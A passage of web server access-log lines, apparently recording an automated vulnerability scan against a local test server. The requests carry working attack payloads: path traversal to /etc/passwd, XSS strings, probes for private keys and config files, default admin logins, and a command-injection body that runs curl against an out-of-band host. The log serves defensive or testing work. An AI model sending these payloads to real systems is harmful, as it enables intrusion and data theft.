"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendarix/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/87 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"http:","request":"POST /auth/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/88 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.179","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sapi/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/89 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /privatekey.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"{\x22email\x22:\x22297MTxtLKLl8JB39TpFi3EL3vAY@example.com\x22,\x22password\x22:\x22297MTxtLKLl8JB39TpFi3EL3vAY\x22,\x22username\x22:\x22297MTxtLKLl8JB39TpFi3EL3vAY\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/reg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/group/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/flags HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"{\x22get_user_login_cmd\x22:{\x22name\x22:\x22admin\x22,\x22password\x22:\x2221232f297a57a5a743894a0e4a801fc3\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"{\x22name\x22:\x22297MTxtLKLl8JB39TpFi3EL3vAY\x22,\x22basepath\x22:\x22\x22,\x22group_id\x22:\x22{{group_id}}\x22,\x22icon\x22:\x22code-o\x22,\x22color\x22:\x22cyan\x22,\x22project_type\x22:\x22private\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/project/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /telescope/requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dokuwiki/doku.php?id=wiki:welcome&at= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/afr.php?refresh=10000&\x22)',10000000);alert(1337);setTimeout('alert(\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"\x22name\x22:\x22';$(curl http://c9v8h88smpv8c1ig07h0gdsphg1tww98r.oast.fun);'\x22,\x0D\x0A\x22email\x22:\x22a@b.c\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysadmin/phpMyAdmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt2parser.cgi?home_en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 